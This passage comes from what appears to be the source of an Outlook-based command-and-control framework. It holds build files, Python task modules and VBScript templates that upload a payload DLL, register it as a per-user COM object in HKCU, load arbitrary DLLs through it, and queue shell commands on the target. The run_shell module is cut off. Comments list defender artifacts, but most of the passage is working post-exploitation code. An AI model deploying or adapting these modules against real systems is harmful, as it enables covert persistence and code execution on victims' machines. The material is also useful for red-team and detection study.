{AF2D318C-2C5A-4C9D-BE4C-AA5B3E8037DB}.Debug|x86.Build.0 = Debug|Win32
{AF2D318C-2C5A-4C9D-BE4C-AA5B3E8037DB}.Release|x64.ActiveCfg = Release|x64
{AF2D318C-2C5A-4C9D-BE4C-AA5B3E8037DB}.Release|x64.Build.0 = Release|x64
{AF2D318C-2C5A-4C9D-BE4C-AA5B3E8037DB}.Release|x86.ActiveCfg = Release|Win32
{AF2D318C-2C5A-4C9D-BE4C-AA5B3E8037DB}.Release|x86.Build.0 = Release|Win32
{B58767EE-5185-4E99-818F-6285332400E6}.Debug|x64.ActiveCfg = Debug|x64
{B58767EE-5185-4E99-818F-6285332400E6}.Debug|x86.ActiveCfg = Debug|Win32
{B58767EE-5185-4E99-818F-6285332400E6}.Release|x64.ActiveCfg = Release|x64
{B58767EE-5185-4E99-818F-6285332400E6}.Release|x86.ActiveCfg = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {98C14C87-B4F7-4E1C-B61E-D945B7763368}
EndGlobalSection
EndGlobal
================================================
FILE: api/SpeculaApiPS/SpeculaApiPS.vcxproj
================================================
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<VCProjectVersion>17.0</VCProjectVersion>
<ProjectGuid>{B58767EE-5185-4E99-818F-6285332400E6}</ProjectGuid>
<WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
<Keyword>AtlPSProj</Keyword>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="Shared">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<IntDir>$(Configuration)PS\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<IntDir>$(Configuration)PS\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<IntDir>$(Configuration)PS\</IntDir>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<IntDir>$(Configuration)PS\</IntDir>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<PreprocessorDefinitions>REGISTER_PROXY_DLL;_DEBUG;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ClCompile>
<Link>
<AdditionalDependencies>kernel32.lib;rpcns4.lib;rpcrt4.lib;oleaut32.lib;uuid.lib;%(AdditionalDependencies)</AdditionalDependencies>
<ModuleDefinitionFile>SpeculaApiPS.def</ModuleDefinitionFile>
<RegisterOutput>true</RegisterOutput>
<PerUserRedirection>true</PerUserRedirection>
</Link>
<PreBuildEvent>
<Command>if exist dlldata.c goto :END
echo Error: MIDL will not generate DLLDATA.C unless you have at least 1 interface in the main project.
Exit 1
:END
</Command>
<Message>Checking for required files</Message>
</PreBuildEvent>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<PreprocessorDefinitions>WIN32;REGISTER_PROXY_DLL;_DEBUG;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ClCompile>
<Link>
<AdditionalDependencies>kernel32.lib;rpcns4.lib;rpcrt4.lib;oleaut32.lib;uuid.lib;%(AdditionalDependencies)</AdditionalDependencies>
<ModuleDefinitionFile>SpeculaApiPS.def</ModuleDefinitionFile>
<RegisterOutput>true</RegisterOutput>
</Link>
<PreBuildEvent>
<Command>if exist dlldata.c goto :END
echo Error: MIDL will not generate DLLDATA.C unless you have at least 1 interface in the main project.
Exit 1
:END
</Command>
<Message>Checking for required files</Message>
</PreBuildEvent>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<PreprocessorDefinitions>WIN32;REGISTER_PROXY_DLL;NDEBUG;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<Optimization>MaxSpeed</Optimization>
</ClCompile>
<Link>
<AdditionalDependencies>kernel32.lib;rpcns4.lib;rpcrt4.lib;oleaut32.lib;uuid.lib;%(AdditionalDependencies)</AdditionalDependencies>
<ModuleDefinitionFile>SpeculaApiPS.def</ModuleDefinitionFile>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<RegisterOutput>true</RegisterOutput>
</Link>
<PreBuildEvent>
<Command>if exist dlldata.c goto :END
echo Error: MIDL will not generate DLLDATA.C unless you have at least 1 interface in the main project.
Exit 1
:END
</Command>
<Message>Checking for required files</Message>
</PreBuildEvent>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<PreprocessorDefinitions>REGISTER_PROXY_DLL;NDEBUG;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<Optimization>MaxSpeed</Optimization>
</ClCompile>
<Link>
<AdditionalDependencies>kernel32.lib;rpcns4.lib;rpcrt4.lib;oleaut32.lib;uuid.lib;%(AdditionalDependencies)</AdditionalDependencies>
<ModuleDefinitionFile>SpeculaApiPS.def</ModuleDefinitionFile>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<RegisterOutput>true</RegisterOutput>
<PerUserRedirection>true</PerUserRedirection>
</Link>
<PreBuildEvent>
<Command>if exist dlldata.c goto :END
echo Error: MIDL will not generate DLLDATA.C unless you have at least 1 interface in the main project.
Exit 1
:END
</Command>
<Message>Checking for required files</Message>
</PreBuildEvent>
</ItemDefinitionGroup>
<ItemGroup>
<None Include="..\SpeculaApi\SpeculaApips.def" />
</ItemGroup>
<ItemGroup>
<ClCompile Include="..\SpeculaApi\dlldata.c">
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">false</CompileAsManaged>
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">false</CompileAsManaged>
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">false</CompileAsManaged>
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</CompileAsManaged>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
</PrecompiledHeader>
</ClCompile>
<ClCompile Include="..\SpeculaApi\SpeculaApi_i.c">
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">false</CompileAsManaged>
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">false</CompileAsManaged>
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">false</CompileAsManaged>
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</CompileAsManaged>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
</PrecompiledHeader>
</ClCompile>
<ClCompile Include="..\SpeculaApi\SpeculaApi_p.c">
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">false</CompileAsManaged>
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">false</CompileAsManaged>
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">false</CompileAsManaged>
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</CompileAsManaged>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
</PrecompiledHeader>
</ClCompile>
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>
================================================
FILE: api/SpeculaApiPS/SpeculaApiPS.vcxproj.filters
================================================
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Generated Files">
<UniqueIdentifier>{3be6a7fa-d612-40eb-b2df-d2d4ff8b27b2}</UniqueIdentifier>
<SourceControlFiles>False</SourceControlFiles>
</Filter>
<Filter Include="Source Files">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="Header Files">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
</Filter>
<Filter Include="Resource Files">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<None Include="..\SpeculaApi\SpeculaApips.def">
<Filter>Source Files</Filter>
</None>
</ItemGroup>
<ItemGroup>
<ClCompile Include="..\SpeculaApi\SpeculaApi_i.c">
<Filter>Generated Files</Filter>
</ClCompile>
<ClCompile Include="..\SpeculaApi\SpeculaApi_p.c">
<Filter>Generated Files</Filter>
</ClCompile>
<ClCompile Include="..\SpeculaApi\dlldata.c">
<Filter>Generated Files</Filter>
</ClCompile>
</ItemGroup>
</Project>
================================================
FILE: functions/api/install_api.py
================================================
import copy
import os
from lib.core.specmodule import SpecModule
from lib.modhandlers.generic import quotedstring,makebool
from lib.core.utility import TaskClass
class Spec(SpecModule):
    """Server-side definition of the ``install_api`` task.

    The module declares its options and help text in ``__init__`` and reacts to
    the agent's reply in ``rethandler`` by queueing follow-up tasks (directory
    creation, DLL upload, optional verification).

    Artefacts visible from this code alone: a directory and a DLL written at
    the path held in the ``file`` option, plus registry writes (the help text
    mentions reg keys and the module depends on ``Setregvalue_hkcu.txt``).
    The rendered template that performs the registry writes is not part of
    this class. The ``file`` default is operator-configurable, so the default
    path is not a stable indicator on its own.
    """

    def __init__(self, templatepath, helpers):
        """Declare options, help text and template dependencies.

        Args:
            templatepath: Passed unchanged to ``SpecModule.__init__``.
            helpers: Framework helper object; kept on ``self.helpers`` and
                used by ``rethandler``.
        """
        self.options = {
            'file': {
                "value": "c:\\com-test\\v2\\specula_com.dll",
                "required": True,
                "description": "Where to upload and register api dll",
                "handler": quotedstring
            },
            'addverifytask': {
                "value": "True",
                "required": True,
                "description": "Will add the verify task as the next task if this is set to true.",
                "handler": makebool
            },
        }
        self.helpers = helpers
        self.help = """
Sets reg keys to install com object to interface with Windows API.
This module uploads the OutlookHelper DLL file automatically (Queued as tasks).
In order to leverage the API modules you need to run the api_verify at least once so that the verification
process runs on target and updates the specula database.
"""
        self.entry = 'install_api'
        self.depends = ['./helperFunctions/Setregvalue_hkcu.txt']
        super().__init__(templatepath)

    def rethandler(self, agent, options, data):
        """Handle the agent's reply and queue the follow-up tasks.

        Only the first two characters of ``data`` are inspected. ``"64"`` and
        ``"32"`` select which payload DLL is uploaded; any other value is
        treated as a failed architecture detection, in which case an
        ``api/remove_api`` task (with ``deletedlls`` set to ``"False"``) is
        queued and nothing else happens.

        Args:
            agent: Agent record; receives the queued tasks and has
                ``officearch``, ``api_dll`` and ``api_installed`` updated.
            options: Option dictionary for this task; ``file`` and
                ``addverifytask`` are read.
            data: Reply from the agent; its first two characters carry the
                detected Office architecture.
        """
        helpers = self.helpers

        def queue(modname, module, snapshot_options=True):
            # Render first, then read the entry point, then snapshot the
            # options, so later edits to the module's option dict cannot
            # alter a task that is already queued.
            rendered = helpers.renderModule(module, agent)
            entry = module.entry
            task_options = copy.deepcopy(module.options) if snapshot_options else {}
            agent.add_task(TaskClass(modname, rendered, entry, task_options, True))

        arch = data[:2]
        if arch != "64" and arch != "32":
            helpers.speclog("Failed to detect office arch, api install failed", True)
            cleanup = helpers.get_module('api/remove_api')
            cleanup.options['deletedlls']['value'] = "False"
            queue('api/remove_api', cleanup)
            return

        # Pick the payload DLL that matches the reported Office bitness.
        is_x64 = arch == "64"
        dll_suffix = ".x64.dll" if is_x64 else ".dll"
        localdll = os.path.join(helpers.getpayloaddir(), "api/" + "SpeculaApi" + dll_suffix)
        if is_x64:
            helpers.speclog("Identified 64 bit office install, uploading 64 bit dll", False)
            agent.officearch = "x64"
        else:
            helpers.speclog("Identified 32 bit office install, uploading 32 bit dll", False)
            agent.officearch = "x86"

        destination = options['file']['value']

        # Create the parent directory first. If the configured path contains no
        # backslash, rsplit returns the whole string, so the "folder" equals
        # the file path itself.
        folderpath = destination.rsplit('\\', 1)[0]
        mkdir = helpers.get_module('operation/file/create_dir')
        mkdir.options['directory']['value'] = folderpath
        queue('operation/file/create_dir', mkdir)

        # Queue the DLL upload to the configured destination.
        upload = helpers.get_module('operation/file/put_file')
        upload.options['file']['value'] = localdll
        upload.options['destination']['value'] = destination
        queue('operation/file/put_file', upload)

        # These fields are set when the tasks are queued, not when they have
        # run; per the help text, verification is a separate step.
        agent.api_dll = destination
        agent.api_installed = True

        # NOTE(review): this is a plain truthiness test. The declared default is
        # the string "True"; if the raw string "False" can reach this point
        # without makebool having been applied, the branch still runs. Confirm
        # with the caller.
        if options['addverifytask']['value']:
            verify = helpers.get_module('api/verify_api')
            queue('api/verify_api', verify, snapshot_options=False)
================================================
FILE: functions/api/install_api.txt
================================================
Function install_api()
' Template for the agent-side half of install_api. {{file}} is filled in by the server
' from the "file" option (install_api.py routes it through the quotedstring handler,
' which presumably adds the surrounding quotes - handler not shown here).
' Registers the COM class "SpeculaApi.Specula" for the current user only, by writing
' values below HKCU\software\classes\ through SetRegValue_HKCU (helper from
' helperFunctions/Setregvalue_hkcu.txt; its arguments look like key path, value type,
' value name, data - confirm against the helper).
' Returns a string that starts with "32" or "64" (install_api.py reads data[:2]),
' followed by one helper result per line.
' Defender note: all writes target the current user's hive. The artifacts are the ProgIDs
' SpeculaApi.Specula and SpeculaApi.Specula.1, CLSID {e8b55279-c6b4-48f3-8138-b727337c0236},
' TypeLib {5be8ef76-6253-482a-926e-d1d877de3b63}, Interface {B0F5F947-8064-48F7-A623-5C058DC91CC8},
' and InprocServer32 / TypeLib win32 / win64 default values holding the {{file}} path.
' Errors are suppressed, so a failed step does not stop the remaining writes.
On Error Resume Next
is64 = false
Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator")
Set objreg = objLocator.ConnectServer(".", "root\cimv2").Get("StdRegProv")
' 2147483650 is HKEY_LOCAL_MACHINE: read the install path recorded for outlook.exe.
objreg.GetStringValue 2147483650, "SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\outlook.exe", "Path", strPath
' Bitness heuristic: a path containing "x86" is treated as 32-bit Office, anything else
' (including an empty strPath after a failed read) as 64-bit.
if InStr(strPath, "x86") > 0 Then
SetValue_HKCU_Registry = "32"
else
SetValue_HKCU_Registry = "64"
is64 = true
end if
' From here on SetValue_HKCU_Registry is a plain string accumulator, not a function call.
basepath = "software\classes\"
' ProgID entries (version-independent and versioned) pointing at the CLSID.
SetValue_HKCU_Registry = SetValue_HKCU_Registry & SetRegValue_HKCU(basepath + "SpeculaApi.Specula", "REG_SZ", "@", "Specula class") & vbCrLf
SetValue_HKCU_Registry = SetValue_HKCU_Registry & SetRegValue_HKCU(basepath + "SpeculaApi.Specula\CurVer", "REG_SZ", "@", "SpeculaApi.Specula.1") & vbCrLf
SetValue_HKCU_Registry = SetValue_HKCU_Registry & SetRegValue_HKCU(basepath + "SpeculaApi.Specula.1", "REG_SZ", "@", "Specula class") & vbCrLf
SetValue_HKCU_Registry = SetValue_HKCU_Registry & SetRegValue_HKCU(basepath + "SpeculaApi.Specula.1\CLSID", "REG_SZ", "@", "{e8b55279-c6b4-48f3-8138-b727337c0236}") & vbCrLf
' CLSID entry; InprocServer32 names the DLL that is loaded in-process when the class is created.
SetValue_HKCU_Registry = SetValue_HKCU_Registry & SetRegValue_HKCU(basepath + "CLSID\{e8b55279-c6b4-48f3-8138-b727337c0236}", "REG_SZ", "@", "Specula class") & vbCrLf
SetValue_HKCU_Registry = SetValue_HKCU_Registry & SetRegValue_HKCU(basepath + "CLSID\{e8b55279-c6b4-48f3-8138-b727337c0236}\InprocServer32", "REG_SZ", "@", {{file}}) & vbCrLf
SetValue_HKCU_Registry = SetValue_HKCU_Registry & SetRegValue_HKCU(basepath + "CLSID\{e8b55279-c6b4-48f3-8138-b727337c0236}\InprocServer32", "REG_SZ", "ThreadingModel", "Free") & vbCrLf
SetValue_HKCU_Registry = SetValue_HKCU_Registry & SetRegValue_HKCU(basepath + "CLSID\{e8b55279-c6b4-48f3-8138-b727337c0236}\ProgId", "REG_SZ", "@", "SpeculaApi.Specula.1") & vbCrLf
SetValue_HKCU_Registry = SetValue_HKCU_Registry & SetRegValue_HKCU(basepath + "CLSID\{e8b55279-c6b4-48f3-8138-b727337c0236}\Programmable", "REG_SZ", "@", "") & vbCrLf
SetValue_HKCU_Registry = SetValue_HKCU_Registry & SetRegValue_HKCU(basepath + "CLSID\{e8b55279-c6b4-48f3-8138-b727337c0236}\TypeLib", "REG_SZ", "@", "{5be8ef76-6253-482a-926e-d1d877de3b63}") & vbCrLf
SetValue_HKCU_Registry = SetValue_HKCU_Registry & SetRegValue_HKCU(basepath + "CLSID\{e8b55279-c6b4-48f3-8138-b727337c0236}\Version", "REG_SZ", "@", "1.0") & vbCrLf
SetValue_HKCU_Registry = SetValue_HKCU_Registry & SetRegValue_HKCU(basepath + "CLSID\{e8b55279-c6b4-48f3-8138-b727337c0236}\VersionIndependentProgID", "REG_SZ", "@", "SpeculaApi.Specula") & vbCrLf
' Type library entry; the win32 path is always written, win64 only when is64 is set.
SetValue_HKCU_Registry = SetValue_HKCU_Registry & SetRegValue_HKCU(basepath + "TypeLib\{5be8ef76-6253-482a-926e-d1d877de3b63}\1.0", "REG_SZ", "@", "SpeculaApiLib") & vbCrLf
SetValue_HKCU_Registry = SetValue_HKCU_Registry & SetRegValue_HKCU(basepath + "TypeLib\{5be8ef76-6253-482a-926e-d1d877de3b63}\1.0\FLAGS", "REG_SZ", "@", "0") & vbCrLf
SetValue_HKCU_Registry = SetValue_HKCU_Registry & SetRegValue_HKCU(basepath + "TypeLib\{5be8ef76-6253-482a-926e-d1d877de3b63}\1.0\0\win32", "REG_SZ", "@", {{file}}) & vbCrLf
if (is64) then
SetValue_HKCU_Registry = SetValue_HKCU_Registry & SetRegValue_HKCU(basepath + "TypeLib\{5be8ef76-6253-482a-926e-d1d877de3b63}\1.0\0\win64", "REG_SZ", "@", {{file}}) & vbCrLf
end if
' Interface entry, tied to the same type library.
SetValue_HKCU_Registry = SetValue_HKCU_Registry & SetRegValue_HKCU(basepath + "Interface\{B0F5F947-8064-48F7-A623-5C058DC91CC8}", "REG_SZ", "@", "ISepcula") & vbCrLf
SetValue_HKCU_Registry = SetValue_HKCU_Registry & SetRegValue_HKCU(basepath + "Interface\{B0F5F947-8064-48F7-A623-5C058DC91CC8}\ProxyStubClsid32", "REG_SZ", "@", "{00020424-0000-0000-C000-000000000046}") & vbCrLf
SetValue_HKCU_Registry = SetValue_HKCU_Registry & SetRegValue_HKCU(basepath + "Interface\{B0F5F947-8064-48F7-A623-5C058DC91CC8}\TypeLib", "REG_SZ", "@", "{5be8ef76-6253-482a-926e-d1d877de3b63}") & vbCrLf
SetValue_HKCU_Registry = SetValue_HKCU_Registry & SetRegValue_HKCU(basepath + "Interface\{B0F5F947-8064-48F7-A623-5C058DC91CC8}\TypeLib", "REG_SZ", "Version", "1.0") & vbCrLf
install_api = SetValue_HKCU_Registry
End Function
================================================
FILE: functions/api/load_dll.py
================================================
from lib.core.specmodule import SpecModule
class Spec(SpecModule):
    """Server-side definition of the ``load_dll`` module.

    Declares one required option, ``dll``, and refuses to run for agents
    whose ``api_verified`` attribute does not compare equal to True.
    """

    def __init__(self, templatepath, helpers):
        """Declare the option, help text and entry point.

        Args:
            templatepath: passed unchanged to ``SpecModule.__init__``.
            helpers: framework helper object, kept on ``self.helpers``.
        """
        self.helpers = helpers
        self.options = {
            'dll': {
                "value": None,
                "required": True,
                "description": "dll to load",
                "handler": None,
            },
        }
        self.help = """
Loads a dll from disk using LoadLibrary
"""
        self.entry = 'load_dll'
        self.depends = []
        super().__init__(templatepath)

    def preprocess(self, agent):
        """Raise RuntimeError unless ``agent.api_verified`` equals True."""
        not_verified = (
            "API has not been verified, please run api_verify first to check that the API is working\n"
            "If it works it will mark the attribute api_verified to True\n"
            "To override you would need to use dbedit to change the value to true"
        )
        # Loose comparison kept on purpose: a stored 1 also counts as verified.
        if agent.api_verified != True:
            raise RuntimeError(not_verified)
================================================
FILE: functions/api/load_dll.txt
================================================
Function load_dll
' Template: {{dll}} is replaced by the server with the "dll" option and lands inside the
' double quotes below (load_dll.py declares no handler for it, so the value is presumably
' inserted as typed - confirm against the renderer).
' Creates the SpeculaApi.Specula COM object and calls its LoadDll method with that path.
' Returns the string "True" when LoadDll returns 1, otherwise "False". Because errors are
' suppressed, a failed CreateObject also ends in "False".
' Defender note: the object is resolved through the ProgID SpeculaApi.Specula, i.e. the
' per-user COM registration written by install_api.txt in this repository.
on error resume next
Set SpeculaApi = window.external.OutlookApplication.CreateObject("SpeculaApi.Specula")
if SpeculaApi.LoadDll("{{dll}}") = 1 Then
load_dll = "True"
Else
load_dll = "False"
End If
End Function
================================================
FILE: functions/api/remove_api.py
================================================
from lib.core.specmodule import SpecModule
from lib.modhandlers.generic import quotedstring,makebool
class Spec(SpecModule):
    """Server-side definition of the ``remove_api`` module.

    Options: ``deletedlls`` (whether the template should also try to delete
    the DLL) and ``dll`` (its path, or "autoresolve" to take the path stored
    on the agent record).
    """

    def __init__(self, templatepath, helpers):
        """Declare options, help text, entry point and helper dependencies.

        Args:
            templatepath: passed unchanged to ``SpecModule.__init__``.
            helpers: framework helper object, kept on ``self.helpers``.
        """
        self.helpers = helpers
        self.options = {
            'deletedlls': {
                "value": "True",
                "required": True,
                "description": "Attempt to delete dll from disk, won't work if its been loaded into outlook",
                "handler": makebool,
            },
            'dll': {
                "value": "autoresolve",
                "required": True,
                "description": "Path to file on disk, let it be autoresolve to find path in specula db",
                "handler": quotedstring,
            },
        }
        self.help = """
Removes the registry values set by the install_outlookhelperapi.
"""
        self.entry = 'remove_api'
        self.depends = ['./helperFunctions/Delregkey_hkcu.txt', './helperFunctions/Delregvalue_hkcu.txt']
        super().__init__(templatepath)

    def preprocess(self, agent):
        """Resolve ``dll`` from ``agent.api_dll`` when it is "autoresolve".

        Only acts when ``deletedlls`` is the string "True". Raises
        RuntimeError when the agent record holds no ``api_dll`` value.
        """
        if self.options['deletedlls']['value'] != "True":
            return
        if self.options['dll']['value'] != "autoresolve":
            return
        if not agent.api_dll:
            raise RuntimeError("No value found in Specula DB for api_dll - Rerun and specify path manually or set deletedlls to False")
        self.options['dll']['value'] = agent.api_dll

    def rethandler(self, agent, options, data):
        """Clear the API state on the agent record.

        Runs regardless of what ``data`` contains: the stored DLL path is
        dropped and both ``api_installed`` and ``api_verified`` become False.
        """
        agent.api_dll = None
        agent.api_installed = False
        agent.api_verified = False
================================================
FILE: functions/api/remove_api.txt
================================================
Function remove_api()
' Template: {{deletedlls}} and {{dll}} are replaced by the server (makebool and
' quotedstring handlers in remove_api.py).
' Deletes a fixed list of keys below HKCU\software\classes\ through DelRegKey_HKCU
' (helper from helperFunctions/Delregkey_hkcu.txt, not shown here) and, when
' {{deletedlls}} is True, tries to delete the file at {{dll}}.
' Returns the helper results, one per line, followed by a "Delete file: ... - Fail" or
' "... - Success!" line when file deletion was requested.
' Incident-response note: compared with install_api.txt in this repository, the delete list
' does not name "SpeculaApi.Specula" (it names "OutLookHelper.Sysinfo" instead) and names
' Interface\{e8b55279-...} rather than the Interface\{B0F5F947-8064-48F7-A623-5C058DC91CC8}
' key that the installer writes. Unless the helper does more than its arguments suggest,
' those two registrations stay behind after removal and remain usable as artifacts.
On error resume next
' objLocator is created here but not referenced again in this function.
Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator")
Set fs = window.external.OutlookApplication.CreateObject("Scripting.FileSystemObject")
basepath = "software\classes\"
regdelres = DelRegKey_HKCU(basepath + "OutLookHelper.Sysinfo") & vbCrlf
regdelres = regdelres & DelRegKey_HKCU(basepath + "SpeculaApi.Specula.1") & vbCrlf
regdelres = regdelres & DelRegKey_HKCU(basepath + "CLSID\{e8b55279-c6b4-48f3-8138-b727337c0236}") & vbCrlf
regdelres = regdelres & DelRegKey_HKCU(basepath + "TypeLib\{5be8ef76-6253-482a-926e-d1d877de3b63}") & vbCrlf
regdelres = regdelres & DelRegKey_HKCU(basepath + "Interface\{e8b55279-c6b4-48f3-8138-b727337c0236}") & vbCrlf
if {{deletedlls}} = True Then
If fs.FileExists({{dll}}) = True Then
fs.DeleteFile {{dll}}
else
End If
' Success is decided by checking again whether the file still exists; a file that was
' never there is therefore also reported as "Success!".
If fs.FileExists({{dll}}) = True Then
filedelres = filedelres & "Delete file: " & {{dll}} & " - Fail" & vbCrlf
else
filedelres = filedelres & "Delete file: " & {{dll}} & " - Success!" & vbCrlf
End If
remove_api = regdelres & filedelres
else
remove_api = regdelres
End if
End Function
================================================
FILE: functions/api/run_shell.py
================================================
from lib.core.specmodule import SpecModule
class Spec(SpecModule):
    """Server-side definition of the ``run_shell`` module.

    Declares one required option, ``cmd``, and refuses to run for agents
    whose ``api_verified`` attribute does not compare equal to True.
